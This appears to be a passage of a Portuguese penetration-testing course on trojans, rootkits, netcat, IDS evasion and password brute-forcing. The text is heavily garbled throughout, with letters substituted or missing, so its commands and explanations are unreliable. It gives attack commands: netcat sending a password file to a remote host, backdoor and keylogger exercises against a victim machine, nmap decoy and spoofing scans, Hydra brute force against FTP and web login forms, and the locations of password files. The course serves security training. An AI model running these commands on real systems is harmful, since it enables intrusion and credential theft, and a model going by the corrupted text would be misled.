$ara definirmos os vetoresE e olo3,los em um mapa gr3fio que failite sua visualiDação e ompreensãoE vamos utiliDar uma tnia amada Xmapas mentaisYE desenvolvida para failitar a reunião de informaç%es de forma resumida de ondensada em um mapa gr3fioE e posterior ompreensão das mesmas sem perder seu prinipal signifiado e onteQdos. @amos utiliDar um programa espeífio para issoE e om a reunião das informaç%es onseguidas at o momentoE definirmos os vetores de ataque. -evemos atentar queE ao longo do ursoE novos vetores serão aresentados e alteradosE de aordo om a evolução de nosso onteQdo. @ejamos abai
2!! Pr/ti.a dirigida 1. @amosE em primeiro lugarE instalar o softGare neess3rio para a riação de mapas mentais?
=aptitude install freemind
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 100
2. HtiliDando as informaç%es reunidas at o momentoE vamos definir os vetores de ataqueE lassifi3,los e riar um mapa mental om os mesmos. ". 4resente isso ao relat7rio.
2!10! Contramedidas ●
Como a maioria das varreduras e apliativos de mapeamento utiliDam flags de one<ãoE uma boa onfiguração de regras do fireGall j3 bloqueia a maiorias das tentativas de varreduras.
●
6anter I-S&I$S bem onfigurados para detetar e bloquear I$s que realiDam tentativas de varreduras.
●
BealiDar onstantemente auditorias nas regras de I-S&I$S e fireGallsE testando se os mesmos podem ser burlados e omo. ; a partir dissoE riar e&ou adaptar regras.
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 101
Capítulo Tro$ansF Ha.
!1! "#$etivos ●
;ntender a diferença entre vírus e Gorms
●
;ntender o funionamento das ba:doors
●
;ntender as funionalidades do trojan
●
;ntender o oneito de root:it
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 102
!%! Ha.
!)! Cavalo de Tr9ia ou Tro$an ;orse Segundo os istoriadoresE os gregos tentaram invadir r7ia e sempre eram derrotados pelos troianos. ;ntãoE os gregos tiveram uma brilante idia de riar um avalo de madeira onde eles iriam oloar diversos soldados e presentear os troianos omo reoneimento da potenial defesa e delaração de paD. Com issoE os gregos onseguiram egar ao oração de r7ia sem passar pelos muros e soldados troianos. ;ntãoE enquanto os troianos omemoravam a vit7ria e desansavam tranquilamenteE os soldados gregos saíram do avalo e ataaram r7iaE que aabou sendo onquistada pelos gregos. ;ssa ist7ria fiou oneida omo Cavalo de r7ia. ;ntãoE depois de v3rios sulos desse aonteimentoE aabamos desobrindo que esse truque foi ressusitado.
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 103
Os avalos de tr7ia dos omputadores são programas que aparentemente funionam normaisE mas na verdade eles aabam realiDando outra tarefa sem que o usu3rio tome oneimento. Hm e
!4! Root
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 104
?ernel-land 4diiona 7digo maliioso no :ernel atravs de /6 /oadable ernel 6oduleJE driversE inserção de 7digo direto na mem7riaE oo: de sAsall table Se bem implementadoE pratiamente impossível de ser detetado om o SO em e
>ide Itself? O m7dulo se oultaE não apareendo na listagem de m7dulosE tornando assim impossível de desarreg3,lo
●
File >ider? odos os arquivos que possuir uma pr,determinada palavra em seu nome serão oultos da visualiDação
●
$roess >ider? odos os proessos que possuir uma pr,determinada palavra em seu nome serão oultos da visualiDação
●
So:et +a:door? Se um paote om um tamano predefinido ontendo uma string espeifiada no root:it for reebidoE ser3 iniiar3 um programaE normalmente uma ba:door.
!-! =írus e Gorms @írus e Gorms podem ser usados para infetar e modifiar um sistema a fim de permitir que um ataante gane aesso ao mesmo. 6uitos vírus e Gorms arregam trojans e ba:doors. Hm vírus e um Gorm são softGares maliiosos malGareJ. 4 prinipal diferença entre o vírus e o Gorm que o primeiroE preisa ser e
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 105
anto os vírus quanto os avalos de tr7ia não onseguem infetar um omputador e
!6! ,et.at 'etat uma ferramenta usada para ler e esrever dados em one<%es de rede usando o protoolo C$&I$. -ada sua grande versatilidadeE o 'etat onsiderado pelos a:ers o anivete suíço do C$&I$E podendo ser usado para faDer desde portsans at brute fore atta:s. O nome netat vem do omando ZatZ do /inu<&Hni<. O at onatena arquivos e envia para a saída padrão stdoutJ. O netat faD pratiamente o mesmoE porm ao invs de onatenar arquivosE o netat onatena so:ets C$ e H-$. $ossui inQmeras funç%esE dentre as quais? ●
@arredura de portas
●
+anner grabbing
●
Criação de ba:door
●
unelamento e et.
4lm de failitar a vida do administrador de redeE tambm failita a vida de um invasorE portantoE uidadoW 6ate seu proesso e remova o bin3rio sempre ap7s a
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 106
utiliDaçãoE aso não queira tornar,se a vítima.
.6.1. O$)es o Ne"!a" ●
,e omando , ;
●
,i , ;speifia o intervalo de tempo no qual as linas de te
●
,l , Coloa no netat em estado de esuta listeningJ
●
,/ , Coloa no netat em estado de esuta listeningJE reiniiando o netat om a mesma lina de omando aso a one<ão fee
●
,n , Força o netat a usar apenas endereços de I$ numriosE sem faDer onsultas a servidores -'S
●
,o filename , Hsando para obter um log dos dados de entrada ou saídaE em formato e
●
,p , ;speifia a porta a ser usadaE sujeito a disponibilidade e a restriç%es de privilgio
●
,r , FaD as portas do portsan serem esolidas aleatoriamente
●
,s , ;speifia o endereço I$ da interfae usada para enviar os paotes. $ode ser usado para spoofing de I$sE bastando apenas onfigurar uma interfae do tipo et*?* usando o ifonfigJ om o I$ desejado
●
,t , $ermite usar o n para riar sess%es de telnet por sript. $reisa estar ompilado om a opção ,-;/';
●
,u , Hsar H-$ ao invs de C$
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 107 ●
,v , Controla o nível de mensagens mostradas na tela
●
,G , /imita o tempo m3
●
,D , $ara evitar o envio de dados atravs de uma one<ão C$E e limitar os dados de uma one<ão H-$.
.6.2. Ne"!a" - <"iliEa)=o Transfer@ncia de ar5ui&os) ●
'o servidor? = netcat -l -p !0!0 P pass"t4t
●
'o liente? = cat pass"t4t V netcat ipKserver !0!0
>so como scanner = nc -vv BE"0"0" BB-B!
.6.3. Fn!aeano Ne"!a"s 'etat foi desenvolvido para trabalar om um pipelineE então naturalmente a saída de uma instUnia do 'etat pode alimentar a entrada de outro. 4bai
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 108
O 'etat em modo de esuta no ost2E ao reeber uma one<ão ria um Znovo netatZ para falar om o ost" e oneta a entrada e saída do programa em e
!! LeKlogger eAlogger são programas utiliDados para gravar tudo aquilo que o usu3rio digita no telado. 4lgunsE mais avançadosE armaDenam sreensots da tela ou at mesmo a 3rea ao redor do ponteiro do mouse onde oorre um li:. ;
●
4rdama< 8indoGs $A:eAlogger /inu< , #ttp:$$sourceforge"net$pro1ects$p<&e
4lm dos :eAloggers l7giosE temos os :eAloggers físiosE que podem ser omprados em lojas virtuais por pouos d7lares.
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 109
;sses :eAloggers físios se pareem om adaptadores de telados $S2&HS+E sendo instalados entre o abo do telado e a entrada $S2 da C$HE s7 que eles armaDenam dentro de uma mem7ria flas tudo o que digitado no telado XgrampeadoY. ObviamenteE que a instalação de um dispositivo dessesE seja l7gio ou físioE neessita do uso de reursos de engenaria soial para que o mesmo seja instalado na m3quina do alvo. ; no aso do :eAlogger físioE o ataante preisa ter aesso físio à m3quinaE tanto para instalarE quanto para pegar de volta o dispositivo.
!2! Pr/ti.a dirigida 1. @amos riar uma ba:door e aessar a m3quina alvo atravs dela. 'a m3quina do ataante e
'a m3quina da vítima e
2. Copiar o pA:eAlogger para a m3quina alvo e e
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 110
!! Contramedidas ●
6onitorar onstantemente os serviços e
●
BealiDar varreduras onstantes utiliDando ferramentas espeífiasE omo o HnideE :root:it e o SeuritA 4uditors Besear 4ssistant S4B4JE por e
●
;vitar realiDar a maioria das tarefas omo rootE j3 que para a infeção e alastramentoE a maioria dos malGares preisam de privilgios de root.
Capítulo 9 !roan" a&(door" íru" *oot(%t" e or" - 111
Capítulo 10 Ignorando Proteç*es
10!1! "#$etivos ●
Coneer os meanismos de evasão de fireGall
●
Coneer as tnias de evasão de I-S&I$S
●
;ntender as tnias de anti,forense
Capítulo 10 Ignorando roteç.e" - 112
10!%! 7vasão de AireGall+I@S .om ,map 4s tnias de evasão de fireGall e I-S são utiliDadas para evitar que qualquer tipo de apliação que ontena filtros e ontroles de aessoE possam detetar as aç%es do ataante. anto ferramentas espeífias quanto parUmetros de ferramentas ujo objetivo de utiliDação não espeifiamente esseE podem ser usados. 4bai
●
-f N fragmenta paotesE inluindo paotes I$. 4 idia dividir os abeçalos C$ em v3rios paotesE difiultando a deteção por filtros de paotesE I-S e et.
●
-4 decoy(B:decoy*BD:%EDE...h N realiDa uma varredura utiliDando isas. FaD pareer que v3rios osts da redeE juntamente om seu I$E estão varrendo o alvo. -esse modoE o I-S pode reportar (,1* varreduras em um Qnio I$E mas não saber3 definir quais são isas inoentes e qual I$ est3 realmente realiDando a varredura.
●
-S I'AddressN N realiDa um I$ spoofingE faDendo om que um I-S report uma varredura sendo realiDada a partir de um outro I$E que não o seuE mas que definido por voV.
●
--source-port portnumber N N realiDa um port spoofingE permitindo que seja definido no paote de qual porta ele teoriamente foi enviado. ;ssa tnia e
●
--randomi.e-8osts N ordena de forma aleat7ria os osts alvos de uma varredura. Isso pode tornar a varredura menos 7bvia para sistemas de
Capítulo 10 Ignorando roteç.e" - 113
monitoramento de redeE espeialmente se ombinado om opç%es de ZsloG timingZ. ●
--spoof-mac %AC addressN N faD um 64C spoofingE atribuindo um endereço 64CE definido pelo ataanteE para todos os frames eternet enviados.
10!)! AireGall Tester FireGall ester FesterJ uma ferramenta riada para testar regras de filtragem fireGalls e as apaidades Intrusion -etetion SAstem I-SJ. 4 ferramenta onsiste em 2 sripts perlE um injetor de paotes ftestJ e um sniffer passivo listening sniffer ftestdJ.
10.3.1. Cara!"er+s"i!asG ●
fireGall testing
●
I-S testing
●
Simulação de one<%es reais C$ para inspeionar fireGalls e I-S.
●
Fragmentação de I$ & Fragmentação de C$
●
nias de evasão de I-S
4onload , ttp?&&dev.inversepat.om&ftester 4ocumentação , #ttp:$$dev"inversepat#"com$ftester$ftester"#tml
10.3.2. <"iliEa)=oG
= "$ftest = "$ftestd
Capítulo 10 Ignorando roteç.e" - 114
10.3.3. Sin"aeG
●
$ara paotes C$ e H-$? I$_origem?porta_origem?I$_destino?porta_destino?Flags?$rotoolo?ipo_serviço
●
$ara paotes IC6$?
I$_origem?porta_origem?I$_destino?porta_destino?Flags?IC6$?tipo_imp?7dig o_imp E3emplo) 152.10.*.1?1,1*2#?1*.).*.1?2*,2(?S?C$?22
10!4! @ete.tando ;oneKpots -ifiilmente uma organiDação ou empresa que esteja ontratando profissionais para realiDar um pentestE possui um oneApot em sua rede. 6as ainda assim e
>oneApot de bai
–
>oneApot de alta interatividade
O oneApots de bai
Capítulo 10 Ignorando roteç.e" - 115
respostas são mais onsistentes e o omportamento bem pr7
'map
●
'essus
●
Open@4S
10!-! Pr/ti.a dirigida @arredura om Spoofing e -eoA? nmap -S AB"F8"0" -p BB -' -sY -0 -n AB"F8"B00" nmap -sS Q-source-port ! -p 80 -0 -n -D AB"F8"0"B>, AB"F8"0"B! AB"F8"B00"4
1. BealiDar essas varreduras nos miros viDinosE om o Giresar: rodando. 2. -esobrirE na redeE qual o I$ onde 3 um oneApot sendo e
10!6! Contramedidas ●
6anter regras de fireGall e I-S muito bem onfiguradas
●
6anter a atenção onstante em logs de equipamentos que são respons3veis pela proteção da rede
●
'ão onfiar em apenas um fireGall ou I-SE ompartimentaliDando a rede
Capítulo 10 Ignorando roteç.e" - 116
Capítulo 11 T'.ni.as de Aorça Hruta
11!1! "#$etivos ●
Coneer os meanismos de geração de Gordlist
●
Coneer ferramentas de brutefore
●
;ntender o que boa polítia de senas
Capítulo 11 !&n%&a" de orça ruta - 117
11!%! Hrute Aor.e Hma das mais oneidas tnias de invasão de sistemas E sem dQvidaE o brute fore. O mtodo de funionamento de um ataque desse tipo muito simples? são geradas v3rias tentativas de one<ão a partir do nome de um prov3vel usu3rio da m3quina alvo. 4 tnia onsiste em gerar v3rias ombinaç%es de senas para esse usu3rioE na tentativa de YadivinarY a sena dele. ambm podemos alternar o nome do usu3rioE faDendo brute fore de usu3rio e sena. $ara issoE podemos obter um arquivo amado XGordlistYE no qual podemos gerar diversas ombinaç%es possíveis de senas para testar om o brute fore. +aseados nissoE veremos algumas ferramentas para realiDar esse tipo de teste.
11!)! 5ordlist Hma boa Gordlist fundamental para o suesso de um ataque de brute fore. = possível omprar GordlistsE faDer doGnload ou at mesmo gerar listas de palavras que serão usadas pelas ferramentas de brute fore.
11.3.1. DoHnloa e orlis" 8ordlists podem ser enontradas em diversos loaisE inluindo redes de ompartilamento de arquivos $2$J. 4bai
ttp?&&GGG1.arenet.ne.jp&kGaring&voab&Gordlists&vofreq.tml
●
ttp?&&GGG.outpost5.om&files&8ord/ists.tml
●
ttp?&&Gordlist.soureforge.net&
Capítulo 11 !&n%&a" de orça ruta - 118 ●
ttp?&&rapidsare.om&files&1**012"1&29+Gordlist.rar
'*') ●
e6ule
●
aDaa
●
orrent
11!4! eração de 5ordlist ;
= crunc# ! 8 B>!FE8 P $tmp$%ordlist-numeric
$nde) ●
( tamano mínimo da palavra
●
tamano m3
●
12"#(0) Carateres que serão usados para a geração da lista emos mais algumas opç%es a definir om esta ferramentaE mas desta veD
vamos tentar riar ombinaç%es mais pr7
Capítulo 11 !&n%&a" de orça ruta - 119 = crunc# 0 0 B>!FE8A0 -t 1uniorGGGG P $tmp$1uniorlist
$nde) ●
1* tamano mínimo da palavra
●
1* tamano m3
●
12"#(0)5* Carateres que serão usados para a geração da lista
@amos faDer uso de outra ferramenta para gerar GordlistsE no asoE a ferramenta GAd. 4 diferença dessa ferramenta para o run que essa utiliDa uma maneira mais YinteligenteY de gerar as ombinaç%es. @amos gerar a Gordlist om baseado em um arquivo >6/ de um site qualquer que fiDemos doGnload?
= %
;liminando as palavras repetidas?
= cat $tmp$%ordlist V sort -u P $tmp$%ordlist-inteligente
O GAd onsegue gerar ombinaç%es a partir de arquivos em te
11!-! MoEn TEe Ripper O Pon um dos utilit3rios mais oneidos para deifrar senas no /inu
Capítulo 11 !&n%&a" de orça ruta - 120
Hni< ou jon.ini no 8indoGsE por e
vari3vel valor Os nomes de seç%es e vari3veis são ase,insensitiveE ou sejaE S;C4O1 e
seao1 são a mesma seção e @4B1 e var1 são a mesma vari3vel. Os arateres e são ompletamente ignoradosE assim omo linas em brano. 4bai
8ordlist? 4 Gordlist a ser utiliDada pelo PtB. O arquivo pode estar em qualquer lugarE basta espeifiar o amino orreto nessa vari3vel
●
Idle? Configura o Pon para usar seu C$H quando este estiver inativo. -iminui o desempeno da quebra da senaE porm não impata tanto no desempeno de outros programas. O padrão desta opção ' desabilitadoJ
●
Save? Intervalo no qual o softGare ir3 gravar seu progresso para no aso de uma interrupção ele possa reomeçar novamente de onde avia parado
●
+eep? ;mite um bip quando uma sena quebrada.
GistHules)Single 'esta seção fiam as regras default do softGare para a quebra das senas. São regras omo substituição de stringsE esrita 1"") e outras. GistHules)ordlist
Capítulo 11 !&n%&a" de orça ruta - 121
'esta seção fiam as regras de substituição de arateresE modifiaç%es de palavrasE et quando se est3 usando uma Gordlist para tentar quebrar as senas do arquivo. GistHules)7T 'esta seção fiam as regras utiliDadas quando se est3 quebrando senas ifradas utiliDando o algoritmo '/6 8indoGsJ. IncrementalJ 4qui fiam as regras para o tipo de quebra de senas amado Inremental todos os ZtiposZ de tentativas de quebra de sena que o Pon utiliDa serão e
11.5.1. *ODOS PtB utiliDa alguns modos para que onsiga otimiDar a quebra da sena. ;stes modos são e
6odo 8ordlist
$ara utiliDar esse mtodo voV vai preisar de uma Gordlist. ;
Capítulo 11 !&n%&a" de orça ruta - 122
algoritmosE o PtB se benefiiar3 se voV oloar senas om tamanos mais ou menos pareidos perto umas das outras. $or e
●
6odo Single Cra: = neste modo que voV deveria omeçar a tentar quebrar uma sena. 4quiE
alm de v3rias regras de andling serem apliadasE o PtB vai utiliDar mais informaç%es omo o nome ompleto do usu3rio e seu diret7rio ome para tentar desobrir qual a sena. ;ste modo muito mais r3pido que o modo Z8ordlistZ.
●
6odo Inremental
;ste o modo mais poderoso do PtB. 'ele serão tentadas todas as ombinaç%es possíveis de arateres para tentar quebrar a sena ifrada. -ada a grande quantidade de ombinaç%es possíveisE reomend3vel que se defina alguns parUmetros omo tamano da sena ou onjunto de arateres a serem utiliDadosJ para que voV não fique esperando pela sena ser quebrada por muito tempo. odos os parUmetros para este modo são definidos no arquivo jon.onfE nas seç%es omeçadas om Inremental no nome.
●
6odo ;
;sse modo bastante omple
Capítulo 11 !&n%&a" de orça ruta - 123
11.5.2. LIN:& DF CO*&NDO O Pon suporta v3rias opç%es de lina de omandoE geralmente usadas para ativar determinados modos de uso do softGare. $reste bastante atenção no ase das opç%esE o PtB ase,sensitiveW Hma araterístia muito legal dele que possível abreviar as opç%es da lina de omando desde que não aja ambigidade mais ou menos da maneira omo oorre no sell de roteadores CisoE por e
,,single? -efine o modo ZsingleZ para quebrar as senas.
●
,,Gordlist4BRHI@O? -efine o modo ZGordlistZ para quebrar as senas e define o arquivo 4BRHI@O omo sendo de onde as senas serão lidas. 4qui voV pode utiliDar tambm a opção ,,stdin para diDer que as palavras virão da entrada padrão.
●
,,inremental? -efine que ser3 utiliDado o modo ZinrementalZ para quebrar a senas. Opionalmente voV pode definir que tipo de modo inremental ser3 utiliDado faDendo ,,inrementalc6O-Oh.
●
,,e
●
,,rules? >abilita as regras para Gordlist definidas em jon.onf quando se utiliDa o modo Gordlist.
●
,,stdoutc/;'9>h? Ruando utiliDadoE faD om que o PtB imprima as possíveis senas direto na saída padrão ao invs de tent3,las ontra um as. Se voV definir o parUmetro /;'9> s7 serão impressas senas om arateres at a quantidade espeifiada em /;'9>.
●
,,restorec'O6;h? FaD om que uma sessão que foi interrompida anteriormente ontinue de onde parou. Se voV definir um nome diferente para a sessãoE espeifique o nome dela na lina de omando
Capítulo 11 !&n%&a" de orça ruta - 124
junto om esta opção. 4 sessão fia gravada na ome do PonE em um arquivo amado jon.re. ●
,,session'O6;? -efine o nome da sessão que pode ser utiliDado om a opção restore. 4 esse nome ser3 automatiamente adiionado a e
●
,,statusc'O6;h? 6ostra o status da Qltima sessão ouE se definido o nome da sessãoE da sessão espeifiada.
●
,,ma:e,arset4BR? 9era um arquivo arset para ser utiliDado no modo ZinrementalZ.
●
,,soG? 6ostra as senas do arquivo que voV espeifiou para o PtB que j3 foram quebradas. ;sta opção espeialmente Qtil quando voV tem outra instUnia do PtB rodando.
●
,,test? ;sta opção faD um benmar: de todos os algoritmos ompilados no softGare e os testa para saber se estão funionando orretamente. ;sta opção j3 foi e
●
,,usersc,h'ome do usu3rio ou HI-? Com esta opção voV pode espeifiar para o PtB quais usu3rio voV quer tentar quebrar a sena. @oV pode utiliDar o nome de usu3rio ou o HI- dele e pode separar v3rios usu3rios utiliDando uma vírgula. HtiliDando o Z,Z antes do nome do usu3rioE voV faD om que o Pon ignore aquele usu3rio ou HI-.
●
,,groupsc,h9I-? FaD om que o Pon tente quebrar apenas as senas dos usu3rios partiipantes de um grupo espeifiado ou ignor3,losE se voV utiliDar o Z,ZJ.
●
,,sellsc,hS>;//? 4penas tenta quebrar as senas dos usu3rios ujas sells sejam iguais à que foi espeifiada por voV na lina de omando. HtiliDando o Z,Z voV ignora as sells espeifiadas.
●
,,saltsc,h'H6;BO? -ei
Capítulo 11 !&n%&a" de orça ruta - 125 ●
,,formatFOB64O? $ermite a voV definir o algoritmo a ser usado para quebrar a senaE ignorando a deteção autom3tia do softGare. Os formatos suportados atualmente são -;SE +S-IE 6-(E 4FS e /6. @oV tambm pode utiliDar esta opção quando estiver utiliDando o omando ,,testE omo j3 foi e
●
,,save,memorA1E 2 ou "? ;sta opção define alguns níveis para diDer ao Pon om qual nível de otimiDação ele ir3 utiliDar a mem7ria. Os níveis variam de 1 a "E sendo 1 a mínima otimiDação. ;sta opção faD om que o PtB não afete muito os outros programas utiliDando muita mem7ria.
11.5.3.
4gora podemos e
"$1o#n pass%ord @oaded ! pass%ords %it# ! different salts Oree.SD (D! WB$BXJ 4 4J 4 testeJ a)c testeJ B>! s)J
ambm podemos passar na sinta
Capítulo 11 !&n%&a" de orça ruta - 126 = "$1o#n -%ordfile:$tmp$1uniorlist pass%ord
O Pon gera dois arquivos de log? o Yjon.potYe o YrestoreY. 'o primeiro arquivo estão as senas j3 deifradasE para que em uma nova e
ambm podemos e
= importante ressaltar que o Pon e Bipper possui m7dulos adiionais que não são ompilados durante uma ompilação padrão. ;sses m7dulos podem ser enontrados
no
pr7prio
site
da
ferramentaE
atravs
do
endereço?
ttp?&&GGG.openGall.om&jon&. Os m7dulos adiionais se enontram no final da p3gina iniial. Como e
11!6! T;CD;Kdra O Adra um dos utilit3rios que abrangem uma grande quantidade de serviços que podem ser alvos de brute foreE entre eles? ;/';E F$E FirebirdE >$,9;E >$,>;4-E >$S,9;E >$,>;4-E >$,$BOKTE >$,$BOKT, '/6E >$,FOB6,9;E >$,FOB6,$OSE >$S,FOB6,9;E >$S,FOB6, $OS/-4$2E /4-$"E S6+E S6+'E 6S,SR/E 6TSR/E $OS9B;SE $O$" '/6E I64$E I64$,'/6E 'C$E ''$E $C'FSE ICRE S4$&B"E Ciso autE Ciso enableE S6$,4H>E S6$,4H> '/6E SS>2E S'6$E C@SE Ciso 444E B;K;CE SOCS(E @'CE $O$" e @6Gare,4ut. 4lm dissoE o Adra fornee suporte a one<%es via
Capítulo 11 !&n%&a" de orça ruta - 127
pro
11.6.1.
4p7s bai
$ara e
11.6.2. :ra no "er(inal
;
Capítulo 11 !&n%&a" de orça ruta - 128 ;
;m Y&tmp&usuariosY temos a userlist de ftpE em Y&tmp&passY temos a Gordlist para os usu3rios e em Y&tmp&resultadoY o resultado do brute fore no serviço. @ejamos o onteQdo do arquivo de saída do brute fore? = cat $tmp$resultado = ;
-@
$tmp$usuarios
-
$tmp$pass
-t
!
-v
-o
$tmp$resultado
AB"F8"0"00 ftpJ WBXWftpX #ost: AB"F8"0"00 login: 4 pass%ord: B>!F
O >C,>Adra tambm pode ser usado para realiDar ataques ontra formul3rios Geb. $ara issoE podemos usar a opção ttp,post,form ou ttp,get,formE dependendo do mtodo usado para envio dos dados pelo formul3rio Geb. @amos analisar o omando seguinte? =
#
-l
#
-
pass%ord"lst
-s
80
ZIP
#ttp-post-form
[$administrador$inde4"p#p:usuarioL^S9^_sen#aL^/SS^_su)mitL@o gin:Incorrect sername[
O parUmetro HS;B ser3 substituído pelos usu3riosE no nosso asoE o valor passado para a opção lE no nosso aso o valor XAdraYE e o parUmetro $4SS ser3 substituído pelos valores passados na opção $E no nosso asoE uma Gordlist amada passGord.lst.
Capítulo 11 !&n%&a" de orça ruta - 129
'o e
11!! HruteSS;% O +ruteSS>2 um sriptE que pode ser enontrado em CE $erl ou $AtonE que realiDa ataques de força bruta na porta 22 e utiliDa Gordlists para desobrir senas. $ara e
11!2! Rain#oG Cra.< BainboGCra: um programa que gera rainboG tables para serem usadas na quebra de senas. O BainboGCra: difere dos programas de força bruta onvenionaisE pois utiliDa tabelas previamente riadasE amadas rainboG tablesE para reduDir drastiamente o tempo neess3rio para quebrar senas. Hm 7timo programa para utiliDarmos para quebrar senas 8indoGs om rainboG tables o Opra: =aptitude install op#crac&
Capítulo 11 !&n%&a" de orça ruta - 130
Outro programaE que quebra inlusive ass 6-(E S>41E S>42 e etE o Cain que roda em 8indoGsJ. ●
$ara bai
●
$ara entender mais? #ttp:$$%%%"et#ical#ac&er"net$content$vie%$A>$B>$
11!! Ntili>ando o Rain#oG Cra.< para .riação de Rain#oG Ta#les 11..1. In"ro')=o BainboGCra: uma ferramenta ujo objetivo quebrar as de senas. O mtodo utiliDado pela ferramenta o brute fore. 'esse mtodoE todas as senas em te
$asso 1? usar o rtgen para gerar as rainboG tables.
Capítulo 11 !&n%&a" de orça ruta - 131 ●
$asso 2? usar o rtsort para organiDar as rainboG tables geradas pelo rtgen.
●
$asso "? usar o rra: para busar o onteQdo das rainboG tables organiDadas pelo rtsort.
O proesso de busar o onteQdo no passo finalE equivalente ao proesso de quebra de as. ; todas essas ferramentas são utiliDadas atravs da lina de omando.
11..2. Passo 1G 'sar o r"#en $ara #erar as rain%oH "a%les. O programa rtgen preisa de diversos parUmetros para gerar uma rainboG tableE e a sinta
#as#Kalgorit#m
c#arset
plainte4tKlenKmin
plainte4tKlenKma4
ta)leKinde4 c#ainKlen c#ainKnum partKinde4
;
table_inde< ain_len ain_num part_inde<
significado O algoritmo dos ass lmE ntlmE md( e assim por dianteJ usado na rainboG table. 4 onfiguração dos arateres arsetJ do te
Capítulo 11 !&n%&a" de orça ruta - 132 onfigurada omo 10 bAtes a menor unidade em uma rainboG table. Hma rainboG tables ontm diversas rainboG ains. O ains_num o nQmero de rainboG ains em uma rainboG table. O parUmetro part_inde< determina omo o Zstart pointZ em ada rainboG ain gerado. -eve ser um nQmero ou omeçar om um nQmeroJ.
Os valores orretos de todos os parUmetros dependem do que voVs preisaE e seleionar bons parUmetros requer um bom entendimento do algoritmo de time, memorA tradeoff. Hma onfiguração que funiona est3 logo abai
plainte
table siDe suess rate
omandos para gerar as tabelas
lmE ntlm or md( alpa,numeri c4+C-;F9>IP/6'O$RBSH@8KT`*12"#(0) 5h ou loGeralpa,numeri cabdefgij:lmnopqrstuvG
Se preisar riar uma tabela de ases ntlm ou lmE substitua o Zmd(Z nos omandos aima por ZntlmZ ou ZlmZ. Se preisar de uma tabela om o arset alpa, numeriE substitua o ZloGeralpa,numeriZ nos
Capítulo 11 !&n%&a" de orça ruta - 133 omandos aima por Zalpa,numeriZ. Se uma tabela om ases lm for riadaE tena erteDa de que seu arset seja alpa,numeri ao invs de loGeralpa,numeri. O algoritmo lm nuna utiliDa arateres minQsulos omo strings.
4gora ora de riar uma rainboG table. 4ltere o diret7rio orrente em seu terminal de omando para o diret7rio do BainboGCra:E e e
;sse omando leva # oras para ser ompletado em um omputador om um proessador Core2 -uo ;)"**. = possível parar a e
FinalmenteE esses arquivos são gerados?
Capítulo 11 !&n%&a" de orça ruta - 134 ●
md(_loGeralpa,numeri1,)_*_"**<""((##"2_*.rt
(126+
●
md(_loGeralpa,numeri1,)_1_"**<""((##"2_*.rt
(126+
●
md(_loGeralpa,numeri1,)_2_"**<""((##"2_*.rt
(126+
●
md(_loGeralpa,numeri1,)_"_"**<""((##"2_*.rt
(126+
●
md(_loGeralpa,numeri1,)_#_"**<""((##"2_*.rt
(126+
●
md(_loGeralpa,numeri1,)_(_"**<""((##"2_*.rt
(126+
4goraE o proesso de riação da rainboG table est3 ompleto.
11..3. Passo 2G 'sar o r"sor" $ara or#aniEar as rain%oH "a%les 4s rainboG tables geradas pelo programa rtgen preisam de um p7s, proessamento para tornar sua onsulta mais f3il e r3pida. O programa rtsort utiliDado para organiDar todas as rainboG ains em uma rainboG table. HtiliDe os seguintes omandos? = rtsort md!Klo%eralp#a-numeric=-EK0K8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EKK8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EKBK8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EKK8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EK>K8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EK!K8004!!>>BK0"rt
Cada omando aimaE leva era de 1 a 2 minutos para ompletarem sua e
Capítulo 11 !&n%&a" de orça ruta - 135
11..4. Passo 3G 'sar o r!ra!/ $ara %'s!ar o !on"eJo as rain%oH "a%les O programa rra: utiliDado para aessar as rainboG tables. ;le aeita apenas rainboG tables organiDadas. 4ssumindo que as rainboG tables organiDadas estejam no mesmo diret7rio do programaE para quebrar ases Qnios a lina de omando ser3? = rcrac& "rt -# aquiKvaiKoK#as#KparaKserKque)rado
O primeiro parUmetro espeifia o amino para busar nos arquivos das rainboG tables. Os arateres ZZ e Z!Z podem ser usados para espeifiar v3rios arquivos. 'ormalmente isso leva algumas deDenas segundos para finaliDarE se a string e
Se as rainboG tables que gerou usam o algoritmo lmE o programa rra: possui um suporte espeial para o parUmetro Z,fZ. Hm arquivo de dump de as no formato pGdump neess3rio omo input para o programa rra:. O onteQdo do arquivo pareer3 om o seguinte? 4dministrator?(**?1"a2b0d5"5a1*21aad"b#"(b(1#*#ee?e2#1*05#2bf"bf()a0a#b25*10eff0??? 9uest?(*1?a2505e#20)e5ba5aad"b#"(b(1#*#ee?5d5)dda5(e(1(bbeda5b"ae**f#b#???
O arquivo pGdump a saída de utilit3rios tais omo pGdump2E pGdump" ou outros. ; ontm os ases tanto lm quant ntlm.
Capítulo 11 !&n%&a" de orça ruta - 136
$ara quebrar ases lm em arquivos pGdumpE use o seguinte omando? = rcrac& "rt -f arquivoKp%dump
O algoritmo de as lm onverte todas as letras minQsulas em strings maiQsulas omo resultado dissoE todas as strings quebradas atravs do ase lmE nuna ontm letras minQsulaE enquanto que a string original poed onter letras minQsulas. O programa rra: tentar3 orrigir isso em ases ntlm armaDenados no mesmo arquivo e e
11!10! Pr/ti.a dirigida 1. HtiliDando o arquivo sadoG passado pelo instrutorE vamos e
11!11! "SST33 Re.omenda ●
4taque automatiDado de diion3rio a pasta de senas
●
4taque de força bruta a pasta de senas
●
4taque de força bruta em serviços.
●
Obter a pasta de senas do sistema que guarda nomes de usu3rio e sena
●
$ara sistemas Hni
●
$ara sistemas Hni< que realiDam autentiaç%es S6+E pode enontrar as
Capítulo 11 !&n%&a" de orça ruta - 137
senas de ' em &et&smbpassGd ●
$ara sistemas 'E deverão estar em &Ginn&repair&Sam
